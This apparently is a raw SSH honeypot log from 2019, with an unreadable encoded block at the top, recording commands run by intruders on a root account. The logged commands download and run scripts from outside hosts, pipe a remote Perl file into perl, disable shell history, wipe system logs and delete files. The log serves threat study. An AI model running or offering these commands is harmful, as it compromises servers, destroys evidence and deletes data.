iVRRF8qUkRAKiJYSioyXEkoJ0wqKCJgQCgiYEAoIiFGO1coQComVVkoIjFDODJgXSgjJFsoIjFDODJgXC8yYEQsM0xAKSYtQSpSTEAqMiFbIkJgQCgiYEBfKCJgQCgiIVAqIihELEIoSS5QSEAoImBAKCJgQCgiYEA6QkBCKSMoQiozTCooImBAKCJgQCgiIV0iQmBAKCJgQCgnVEA5NlFTOTIhWyJCYEAoImBAXygiYEAoIiFQKiIoRDhWQUE7QihJLlBIQCgiYEAoImBAKCJgQDpCQEIpJi1IODZYQiozTCooImBAKCJgQD8wSEAoIiFdIkJgQCgmNUw8VkVGKCJARF84ViVTOTJgXT9CYE83Rl1QK1JEQD5QSEAoImBAKCIhTzwiQEIpJyFSOjZZVDsiKEwoIihEOlY1TShCREA6NjhAKSYtQTxWNEA5NyRAKEZdUChDTCpfKCJgQCgiYEA7N0RAKSZdQTxGPEAvMiFTPTYpUz0nKEgpJi1BPFY0TCgjLEkuUEhAKCJgQCgiIU88IkBCKSMkQisiYEIpIyhCKjIhSTlCYEgpJl1BXzxGPEAvN1hAK1JBPDRSTEk3JyxLKiVRMypSRE8qM0wqKCJgQD8wSEAoIiFFOyctSTlCYEgpJi1BPFY0QC83WEArVVlEOTZdUCtSREA+UEhAKCJgQF8oIiFEOTZdUCoiKEQ8JylJO0cxTChCUEAoQjFLOTZUQioyIUk5QmBEOFYlUzkyIUU8MmBCOSY1TzwiKFsiQmBAKCJgQCgmVVkoIjFPODcpRygjVEBfPFc1QjxXMVIqIjFDODctRSsiYFUqM0wqKCJgQCgiYEA5JjVPPCJAQikjJEIrImBCKSMoQioyIUk5QmBIKSZdQTxGPEAvN1hAK1JBPDRSTEk3JyxLXyolUTMqUkRPKjNMKigiYEA/MEhAKCIhRTsnLUk5QmBIKSYtQTxWNEAvN1hAK1VZVjtWRUM5MlxJKCdMKigiYEAoImBAPUZdSThWNEgoQjFQPEZFTl89JlBCKyJgQikmTUU7MihJKCZFRigiMUM4Ny1FKCY1USgiKVY7VkVDOTIoWyJCYEAoImBAKCIxTzg3KUcoI1RAPFc1QjxXMVIqIjFDODctRSsiYFZfKjNMKigiYEAoImBAPUZdSThWNEgoQjBRKEJQQChCMFIoQkRAOjY4QCoiMU84NylHKCNVXigiXEg3JSxLKjVRUypSQTw0UkxJK1JEWyJCYEAoJ1QqXygiYEA5NlFTOjY4QCoiMUM4Ny1FKCNVXigiXT45JjVWO1ZFQzkyXEkoJ0wqKCJgQCgiYEA5JjVWO1ZFQzkyQEIpJyFSOjZZVDsiKEwoIihEOlY1TV8oQkRAOjY4QCkmLUE8VjRAOTckQChGMUU9Rl1JOFY0Qi5QSEAoImBAKCJgRDtWJVI5UmBdKCctVThHLVQ8QkBEOFYlUzkyUEAuIkRbIkJgQCgiYEBfKCYxRT1GXUk4VjRIKEIwUShCUEAoQjBSKEJEQDo2OEAqIjFPODcpRygjVV4oIlxINyUsSyo1UVMqUkE8NFJMSStSRFsiQmBAKCdUKigiYEA5NlFTXzo2OEAqIjFDODctRSgjVV4oIl0+OzctRzcnLEsqJVEzKlJEQCoiWEoqMlxJKCdMKigiYEAoImBAOzctRyoiKEQsMihMKCIoRCxCKEkuUEhAKCIhXV8iQmBAKCY1TDxWRUYoIkBEOFYlUzkyYF0/QmBPN0Y5TDtWXUQ3JyxLKiVRRCpSRTw8UkxINyUsSyoyYEgrQkhJK1JEQD5QSEAoImBAKCIhRjtXKEBfKiZVWSgiMUM5QmBdKCMkWygiMUM5QmBcLzJgRCwzTEApJi1GKlJMSSgnTCooImBAKCJgQCgiIU08VjxIKEIwUihCUEAoQjBTKEJEWyJCYEAoImBAXygnVCooImBAPzBIQCgiIUU7Jy1JOUJgSCkmLUE8VjRALzdYQCtVWUM9Ji1QOUZRTztWMTw8UkxINyYwSyo1UVMqUkE8NFJMSSgiQE4qQkRPKjIhW18iQmBAKCJgQCgmOU88QmBIOzdEQCkmLUYoI1RALDNMQCkmLUYoI1BdKCIwUS5SYEQ4VjhLKlJEQD5QSEAoImBAKCJgQCgmLVQ4V2BIKEIwUihCUEBfKEIwUyhCRFsiQmBAKCJgQCgnVCooImBAPzBIQCgiIUU7Jy1JOUJgSCkmLUE8VjRALzdYQCtVWUM9Ji1QNycsSyolUTMqUkRAKiJYSioyXEkoJ0wqXygiYEAoImBAOFcxQzwiQEIpIyRCKyJgQikjKEIqM0wqKCJgQD8wSEAoIiFFOyctSTlCYEgpJi1BPFY0QC83WEArVVlJO0c5ST0mNTw8UkxINyUsS18qMmBIK0JISStSREA+UEhAKCJgQCgiIUk7RzlJPSY0SChCMFEoQlBAKEIwUihCRFsiQmBAKCdUKigiYEA5NlFTOjY4QCoiMUM4Ny1FKCNVXigiXT5fO0ZFQzpSYEgrQkhJK1JEQD5QSEAoImBAKCIhTjo2LUsqIihELDIoSS5QSEAoIiFdIkJgQCgmNUw8VkVGKCJARDhWJVM5MmBdP0JgTzdGLU87RjVDXz0mJTw8UkxINyUsSyo1UVMqUkE8NFJMSStSREA+UEhAKCJgQCgiYEA4Vl1OOTYtVDg3KEgoQjBSKEJQQChCMFEoQlBALUM4Vi1SRFsiQmBAKCdUKl8oImBAOTZRUzo2OEAqIjFDODctRSgjVV4oIl0+PFY1TjklUVMqUkE8NFJMSTcnLEsqJVEzKlJETyoyIVsiQmBAKCJgQCgkMSMwU0haNFQ1LjEiQEJfKSMkQisiYEIpIyhCKjNMKigiYEA/MEhAKCIhRTsnLUk5QmBIKSYtQTxWNEAvN1hAK1VZUjg3PEAqIlhKKjJcSSgnTCooImBAKCJgQDxWNU45JylBXz1SQEIpIyRCKjNMKigiYEA/MEhAKCIhRTsnLUk5QmBIKSYtQTxWNEAvN1hAK1VZRT1GJUwoIkBOKkJETyoyIVsiQmBAKCJgQCgmNVY4NlBAKEIwUV8oQ0wqKCJgQD8wSEAoIiFFOyctSTlCYEgpJi1BPFY0QC83WEArVVlFO0cxUjg1UVMqUkE8NFJMSTcnLEsqJVFEKlJETyoyIVsiQmBAKCIhUzsmNUVfPCIhSTtHMEg8RiVOOSJARCxCREkuUEhAKCJgQDpCQEIpIyRCKjNMKigiYEA/MEhAKCIhRTsnLUk5QmBIKSYtQTxWNEAvN1hAK1VZUzg2RTw8UkxIXzclLEsqNVFTKlJBPDkiTEkrUkRAPlBIQCgiYEA8VlFFOTdgQDo2WVQqJylBO0YwSCkjKEkqM0wqKCJgQCgnYEgoQjBRKEJEWyJCYEAoJ1QqKCJgQF85NlFTOjY4QCoiMUM4Ny1FKCNVXigiXT48ViVJPEJcSSgnTCooImBAKCIhUT02RVQqIkRbIkJgQCgnVCooImBAOTZRUzo2OEAqIjFDODctRSgjVV5fKCJdPjtGXVY7VllJOFZMTyoyIVsiQmBAKCIhTT4yYEQ7Rl1WO1ZZSThWTEAvMiFHOTcxTjo2LUsqIkRbIkJgQCgiYEA7RkVDOlJAQikmWU89Rl1OXzo2LUsoQkRbIkJgQCgnVCooImBAOTZRUzo2OEAqIjFDODctRSgjVV4oIl0+OTctVDg3MUk8VzFJOFYlUygiQE4qQkRPKjIhWyJCYEAoImBAOjY4QF8qIjBRKCY1USgiKU87QihJKCdMKigiYEAoImBAKSY1Uz0mJVQ6Ny1UOjYtQTxSYF0oIyRbIkJgQCgiYEAoJlVTOVJAQiknIVI6NllUOyIoTCgiKSVfPFcxQT0iWVM9JkVDODcsQDg3MUk9RiVEODcsQShCRFsiQmBAKCJgQD8yIUU7Jy1JOUJgSCkjJEA5NyRAKEZdRjlCKEkoJ0wqKCJgQCgiYEApJjVTXz0mJVQ6Ny1UOjYtQTxSYF0oI2BbIkJgQCgiYEAoJlVTOVJAQiknIVI6NllUOyIoTCgiKSU8VzFBPSJZUz0mRUM4NyxAOSY1Uzg3MUk9RiVEODcsQV8oQkRbIkJgQCgiYEA/MEhAKCIhXSJCYEAoJjVMPFZFRigiQEQ4ViVTOTJgXT9CYE83RyFBOFZdVDk3LEAqIlhKKjJcSSgnTCooImBAKCIhSTlCYEhfKSMkQDk3JEAoRl1OKEJEQD5QSEAoImBAKCJgRDwmJUM7VzFFPFJgXSgjJFsiQmBAKCJgQCgmVVM5UkBCKSchUjo2WVQ7IihMKCIpMDg2LU89JjVTXygmJVQ6NzlBOSZdUygyKEkoJkVGKCJARDk3LVQ4NzFJPFcxSThWJVMoI1RdKCIoUShCRFsiQmBAKCJgQD8yIUU7Jy1JOUJgSCkjJEA5NyRAKEZdRl85QihJKCdMKigiYEAoImBAKSchQThWXVQ5NyxALzJgUC5QSEAoImBAKCIhTTxWPEgoQjFQPEZFTj0mUEIrImBCNCYlQztXMUU8UiFEOTctQT0mRVZfODYxTzxSJEIqMiFJOUJgSCkmNVM9JiVUOjctVDo2LUE8UmBdLzJgQiwyKEkuUEhAKCJgQCgnVCooImBAPzBJXSJHLVU4QiFTOiY1TDsiIVsiQmBAXzxGNVQ9NylOKCc1TjsmNVM8UmBEODYtRTxXLU88VkFFOyZQWyJCYEA7N0RAKSchUjo2WVQ7I1REN1VMUDczTCooIiFNPjJgRDhWXU04NllEO1NURF83VUxRNzNMKigiIUk5QmBIKSYtTzs2JU45JlxALzdYQCtWLUQoIkBOKkJETyoyIVsiQmBAKCIhQzomMUk8QkBCKSMkQioyIVw/IiFNPFY8SChCMVBfPEZFTj0mUEIrImBCMSZFUjk3ME48RkVPKCZFTjk3QUk8VzFFO0cxRSgyKEkuUEhAKCJgQDxGNVQ9NylOLlBIQCgnVCooIiFFOyctSTlCYEgpJyFJXzkiYF0oJjlPPEZMSSgnTCooImBAKCIhVzg2RVQ8JkVEKiIxUDo2MEwoI2BJLlBIQCgnVEA5NlFTOTIhWyJCYEAoImBAKCZFRigiQUY7VylLKjIhW18iQmBAKCJgQCgiYEAoJjVYOjcwWyJCYEAoImBAKCIhXSgmNUw8VjRAPlBIQCgiYEAoImBAKCJgQCgmVVkoJCFSOTctUC82YEQ4Vl1NODZZRDtSYFJfL0I4USgjLF4pQyVALlBIQCgiYEAoImBAKCJgQCgmVVkoIjFDLzNgWyJCYEAoImBAKCJgQCgiYEA5Rl1SOTYlQzoiIU0+MmBEOyZFTjomJEAqJCFSXzk3LVAqMiFbIkJgQCgiYEAoImBAKCJgQCgiYEQ4UkxLLlBIQCgiYEAoImBAKCJgQCgiYEA4VkFPPCJgRDsmRU46JiRbIkJgQCgiYEAoImBAKCJgQF8oIiFTOTZZRDxGJVcqIjEpNEQtPzhXNVI3Vy1POFZNRT0iUEAoRSEyMjU5LTRUPEApJyFSOjZZVDsiYFopJlFJO0ZBQShCRFsiQmBAKCJgQCgiYEBfKCJgQCgiIUk5QmBIKSYsQC9DVEAoQjFMOjZZQTxVXU04N0BCKjIhWyJCYEAoImBAKCJgQCgiYEAoImBAKCIxQy8zYFsiQmBAKCJgQCgiYEAoImBAXygiYEAoJy1MOTY1UCgiMVM7JjVFPCNMKigiYEAoImBAKCJgQCgiYEAoJ1QqKCJgQCgiYEAoImBAKCIhXSJCYEAoImBAKCJgQCgiYEA5N0FJPSNMKl8oImBAKCJgQCgnVCooIiFdIkdUKiJHLVU4QiFBPScxQThWTUU8QiFbIkJgQDs3REApJkVBOSYxUigjVEA6NllFPSVdQT0mXU4qIjE/NlMhPSozTCpfKCIhTT4yYEQ7Ny1HKCNUQClUKEcoJ0BAKSVdOyw1VFsiQmBAOzdEQCkmOVQ6NlVFKCNUQCklXTssRVRbIkJgQDs3REApJi1QKCNUQCwjTCooIiFNXz4yYEgpNyFBOFZdVDk3LEkuUEhAKCIxUDg2LU89JjVTPlZFQzs3IV0oI1RAKSchQThWXVQ5Ny1bOjY9TTwnVEAvMmBEPCYlQztXMUU8V01VOSchXV8oI1RAKSchQThWXVQ5Ny1bO1dUQC8yYEQ8JiVDO1cxRTxXTVQ4VyFdKCNUQCwjTCoiQmBAPFZdQzpWNVQqJS0vMFRMUSsiITAxRV0pM0Q1NCsiITNfM1QtKzdVKSE1UlBALEJEQDtXKEApJi1QKlJMWyJCYEA8Vl1DOlY1VColLS8wVExSKyIhMDFFXSkzRDU0KyIhMzNULSs3VDEnNEQlLSsiYFEtUkRAXztXKEApJi1QKlJMWyJCYEA8Vl1DOlY1VColLS8wVExTKyIhMDFFXSkzRDU0KyIhMzNULSs3VSkhNVJQQCwyREA7VyhAKSYtUCpSTFsiQmBAPFZdQ186VjVUKiUtLzBUTFQrIiEwMUVdKTNENTQrIiEzM1QtKzdVKSE1UlBALUJEQDtXKEApJi1QKlJMWyJCYEA8RjVUPTcpTionNU45JjVGKjIhSTlCYERfOFdgQC8zVEAtI0wqKCIhTT4yYEQ6NzFJOzY0QC8yIVQ6NlVFLlBIQCgmVVkoIkBEOFc1UjdXMUk7NjRJLlBIQCgnPUg6NlFFKCJAQCwyYEkoJ0wqXygiYEAoIiFGO1coQComVVkoIjFQO1cpVDgyYF0oIyRbKCIxUDtXKVQ4MmBcLzJgVi0zNFMtM0xAKSchTzxHMUEqUkxJKCdMKigiYEAoImBAKCIxQ189Nyk/PSZFTTkyYF0oJzFJOzY0QCsyYEQ6NzFJOzY0WyJCYEAoImBAKCIhTDg3LVQoJkVGKCIxQz03KT89JkVNOTJgXi8yYEQ5RzFJOzY0WyJCYEBfKCJgQCgiIVM5NllEKiUtLzBUTFErImBEOzctRysiYFArIiFTO1YtSzg2MUQ8RV1J

From 14.6.101.76 21-Sep-2019 22:18:06 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.61.199/bin.sh || curl http://46.246.61.199/curl.sh -o curl.sh || chmod +x *.sh; ./bin.sh; ./curl.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.61.199/bin.sh || curl http://46.246.61.199/curl.sh -o curl.sh || chmod +x *.sh
./bin.sh
./curl.sh' | sh

From 103.240.158.218 24-Sep-2019 06:42:09 ssh2 root
Exec wdir="/bin"
for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc"
do
if [ -w $i ]
then
wdir=$i
break
fi
done
cd $wdir
curl http://63.141.231.126/w.txt -o ygljglkjgfg0
chmod +x ygljglkjgfg0
./ygljglkjgfg0
wget http://63.141.231.126/w.txt -O ygljglkjgfg1
chmod +x ygljglkjgfg1
./ygljglkjgfg1
good http://63.141.231.126/w.txt -O ygljglkjgfg2
chmod +x ygljglkjgfg2
./ygljglkjgfg2
sleep 2
wget http://63.141.231.126/g.txt -O sdf3fslsdf13
chmod +x sdf3fslsdf13
./sdf3fslsdf13
good http://63.141.231.126/g.txt -O sdf3fslsdf14
chmod +x sdf3fslsdf14
./sdf3fslsdf14
curl http://63.141.231.126/g.txt -o sdf3fslsdf15
chmod +x sdf3fslsdf15
./sdf3fslsdf15
sleep 2
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
cat /dev/null >/root/.bash_history
cat /dev/null > /var/log/wtmp
cat /dev/null > /var/log/btmp
cat /dev/null > /var/log/lastlog
cat /dev/null > /var/log/secure
cat /dev/null > /var/log/boot.log
cat /dev/null > /var/log/cron
cat /dev/null > /var/log/dmesg
cat /dev/null > /var/log/firewalld
cat /dev/null > /var/log/maillog
cat /dev/null > /var/log/messages
cat /dev/null > /var/log/spooler
cat /dev/null > /var/log/syslog
cat /dev/null > /var/log/tallylog
cat /dev/null > /var/log/yum.log
cat /dev/null >/root/.bash_history
ls -la /etc/daemon.cfg
exit $?
wdir="/bin" for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc" do if [ -w $i ] then wdir=$i break fi done cd $wdir curl http://63.141.231.126/w.txt -o ygljglkjgfg0 chmod +x ygljglkjgfg0 ./ygljglkjgfg0

From 92.82.200.181 24-Sep-2019 12:48:50 ssh2 root
clear
ls
w
free -mt
lscpu
clear
ls
cls
t test.pl
cat
cd /var/tmp
ls
mkdir " "
perl
ls
wget
wget gamerloly.tk/Info
curl -O gamerloly.tk/Info
wget

From 45.119.127.213 26-Sep-2019 07:55:54 ssh2 root
Exec wdir="/bin"
for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc"
do
if [ -w $i ]
then
wdir=$i
break
fi
done
cd $wdir
curl http://63.141.231.125/w.txt -o ygljglkjgfg0
chmod +x ygljglkjgfg0
./ygljglkjgfg0
wget http://63.141.231.125/w.txt -O ygljglkjgfg1
chmod +x ygljglkjgfg1
./ygljglkjgfg1
good http://63.141.231.125/w.txt -O ygljglkjgfg2
chmod +x ygljglkjgfg2
./ygljglkjgfg2
sleep 2
wget http://63.141.231.125/g.txt -O sdf3fslsdf13
chmod +x sdf3fslsdf13
./sdf3fslsdf13
good http://63.141.231.125/g.txt -O sdf3fslsdf14
chmod +x sdf3fslsdf14
./sdf3fslsdf14
curl http://63.141.231.125/g.txt -o sdf3fslsdf15
chmod +x sdf3fslsdf15
./sdf3fslsdf15
sleep 2
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
cat /dev/null >/root/.bash_history
cat /dev/null > /var/log/wtmp
cat /dev/null > /var/log/btmp
cat /dev/null > /var/log/lastlog
cat /dev/null > /var/log/secure
cat /dev/null > /var/log/boot.log
cat /dev/null > /var/log/cron
cat /dev/null > /var/log/dmesg
cat /dev/null > /var/log/firewalld
cat /dev/null > /var/log/maillog
cat /dev/null > /var/log/messages
cat /dev/null > /var/log/spooler
cat /dev/null > /var/log/syslog
cat /dev/null > /var/log/tallylog
cat /dev/null > /var/log/yum.log
cat /dev/null >/root/.bash_history
ls -la /etc/daemon.cfg
exit $?

wdir="/bin" for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc" do if [ -w $i ] then wdir=$i break fi done cd $wdir curl http://63.141.231.125/w.txt -o ygljglkjgfg0 chmod +x ygljglkjgfg0 ./ygljglkjgfg0

From 79.124.8.110 27-Sep-2019 13:59:15 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.95.168.161/Tadaa.sh; curl -O http://45.95.168.161/Tadaa.sh; chmod 777 Tadaa.sh; sh Tadaa.sh; tftp 45.95.168.161 -c get Tadaa.sh; chmod 777 Tadaa.sh; sh Tadaa.sh; tftp -r Tadaa2.sh -g 45.95.168.161; chmod 777 Tadaa2.sh; sh Tadaa2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.168.161 Tadaa1.sh Tadaa1.sh; sh Tadaa1.sh; rm -rf Tadaa.sh Tadaa.sh Tadaa2.sh Tadaa1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.95.168.161/Tadaa.sh
curl -O http://45.95.168.161/Tadaa.sh
chmod 777 Tadaa.sh
sh Tadaa.sh
tftp 45.95.168.161 -c get Tadaa.sh
chmod 777 Tadaa.sh
sh Tadaa.sh
tftp -r Tadaa2.sh -g 45.95.168.161
chmod 777 Tadaa2.sh
sh Tadaa2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.95.168.161 Tadaa1.sh Tadaa1.sh
sh Tadaa1.sh
rm -rf Tadaa.sh Tadaa.sh Tadaa2.sh Tadaa1.sh
rm -rf *

From 31.30.120.136 30-Sep-2019 03:45:06 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget --timeout=15 --tries=2 -qO - 203.146.208.208/drago/images/.ssh/.ssh/zyk | perl - || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk | perl - ;rm -rf zyk;cd
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget --timeout=15 --tries=2 -qO - 203.146.208.208/drago/images/.ssh/.ssh/zyk | perl - || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk | perl -
rm -rf zyk
cd
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget --timeout=15 --tries=2 -qO - 203.146.208.208/drago/images/.ssh/.ssh/zyk | perl - || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk | perl - ;rm -rf zyk;cd
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget --timeout=15 --tries=2 -qO - 203.146.208.208/drago/images/.ssh/.ssh/zyk | perl - || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk | perl -
rm -rf zyk
cd

From 31.30.120.136 30-Sep-2019 04:25:22 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget --timeout=15 --tries=2 -qO - 203.146.208.208/drago/images/.ssh/.ssh/zyk | perl - || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk | perl - ;rm -rf zyk;cd
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget --timeout=15 --tries=2 -qO - 203.146.208.208/drago/images/.ssh/.ssh/zyk | perl - || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk | perl -
rm -rf zyk
cd

From 31.30.120.136 30-Sep-2019 04:57:53 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;perl zyk;rm -rf zyk .a
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
perl zyk
rm -rf zyk .a
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;perl zyk;rm -rf zyk .a
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
perl zyk
rm -rf zyk .a

From 31.30.120.136 30-Sep-2019 05:45:42 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;perl zyk;rm -rf zyk .a
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
perl zyk
rm -rf zyk .a

From 31.30.120.136 1-Oct-2019 07:31:29 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a

From 31.30.120.136 1-Oct-2019 07:34:51 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a

From 31.30.120.136 4-Oct-2019 14:06:19 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a

From 31.30.120.136 4-Oct-2019 14:50:04 ssh2 root
